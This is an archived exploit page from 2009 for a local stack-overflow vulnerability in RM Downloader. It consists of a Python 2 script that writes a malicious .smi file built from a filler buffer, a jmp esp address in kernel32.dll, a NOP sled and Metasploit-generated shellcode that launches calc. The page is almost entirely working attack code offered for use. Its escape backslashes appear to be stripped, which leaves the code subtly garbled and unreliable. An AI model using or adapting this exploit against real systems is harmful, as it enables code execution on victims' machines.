RM Downloader (.smi File) Local Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RM Downloader (.smi File) Local Stack Overflow Exploit
# Published : 2009-05-01
# Author : ThE g0bL!N
# Previous Title : Chasys Media Player 1.1 .cue File Stack Overflow Exploit
# Next Title : Beatport Player 1.0.0.283 (.m3u) Local SEH Overwrite Exploit

#usage: exploit.py
print "**************************************************************************"
print " RM Downloader (.smi) Local Stack Overflown"
print " Exploit code: ThE g0bL!N"
print " Tested on: Windows XP Pro SP3 (EN)n"
print " greetz: His0k4 Dos-Dz TeaM-Snakes Team and all My friendn"
print "**************************************************************************"
                     
buff = "x41" * 26083
jump = "x5Dx38x82x7C" # jmp esp kernel32.dll
nops = "x90"*6

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x4b"
"x1dxa3xb6x83xebxfcxe2xf4xb7xf5xe7xb6x4bx1dx28xf3"
"x77x96xdfxb3x33x1cx4cx3dx04x05x28xe9x6bx1cx48xff"
"xc0x29x28xb7xa5x2cx63x2fxe7x99x63xc2x4cxdcx69xbb"
"x4axdfx48x42x70x49x87xb2x3exf8x28xe9x6fx1cx48xd0"
"xc0x11xe8x3dx14x01xa2x5dxc0x01x28xb7xa0x94xffx92"
"x4fxdex92x76x2fx96xe3x86xcexddxdbxbaxc0x5dxafx3d"
"x3bx01x0ex3dx23x15x48xbfxc0x9dx13xb6x4bx1dx28xde"
"x77x42x92x40x2bx4bx2ax4exc8xddxd8xe6x23xedx29xb2"
"x14x75x3bx48xc1x13xf4x49xacx7exc2xdax28x1dxa3xb6")


exploit = buff + jump + nops + shellcode

try:
    out_file = open("exploit.smi",'w')
    out_file.write(exploit+"rn")
    out_file.close()
    raw_input("nExploit file created!n")
except:
    print "Error"

# www.Syue.com [2009-05-01]